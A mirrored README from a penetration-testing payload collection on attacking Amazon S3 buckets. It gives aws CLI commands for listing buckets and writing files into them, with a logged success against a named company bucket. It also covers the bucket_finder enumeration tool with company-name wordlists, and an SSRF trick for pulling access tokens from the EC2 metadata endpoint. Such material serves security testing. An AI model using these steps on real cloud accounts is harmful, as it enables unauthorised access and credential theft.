ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-20 19:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f131aebce4
PayloadsAllTheThings/AWS Amazon Bucket S3/README.md
Swissky f131aebce4 SSRF updates and methodology aquatone tool
2017-06-17 23:20:24 +02:00

2.5 KiB
Raw Blame History

Amazon Bucket S3 AWS

By default the name of Amazon Bucket are

http://s3.amazonaws.com/[bucket_name]/
http://[bucket_name].s3.amazonaws.com/

Move a file into the bucket

sudo apt install awscli

touch test.txt
aws s3 mv test.txt s3://hackerone.marketing
FAIL : "move failed: ./test.txt to s3://hackerone.marketing/test.txt A client error (AccessDenied) occurred when calling the PutObject operation: Access Denied."

aws s3 mv test.txt s3://hackerone.files
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"

Basic test

aws s3 ls s3://targetbucket

Bucket Finder

A cool tool that will search for readable buckets and list all the files in them. It can also be used to quickly find buckets that exist but deny access to listing files.

wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
./bucket_finder.rb my_words
./bucket_finder.rb --region ie my_words
	US Standard         = http://s3.amazonaws.com
	Ireland             = http://s3-eu-west-1.amazonaws.com
	Northern California = http://s3-us-west-1.amazonaws.com
	Singapore           = http://s3-ap-southeast-1.amazonaws.com
	Tokyo               = http://s3-ap-northeast-1.amazonaws.com

./bucket_finder.rb --download --region ie my_words
./bucket_finder.rb --log-file bucket.out my_words

Use a custom wordlist for the bucket finder, can be created with

List of Fortune1000 company names with permutations on .com, -backup, -media. For example, walmart becomes walmart, walmart.com, walmart-backup, walmart-media.
List of the top Alexa 100,000 sites with permutations on the TLD and www. For example, walmart.com becomes www.walmart.com, www.walmart.net, walmart.com, and walmart.

Thanks to

This is one of my favorite tricks. More and more companies host part of their infrastructure on Amazon EC2. Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. Heres the AWS documentation. If you found an SSRF vulnerability that runs on EC2, try requesting http://169.254.169.254/latest/meta-data/. This will return a lot of useful information for you to understand the infrastructure and may reveal Amazon S3 access tokens, API tokens, and more. You may also want to download http://169.254.169.254/latest/user-data/ and unzip the data.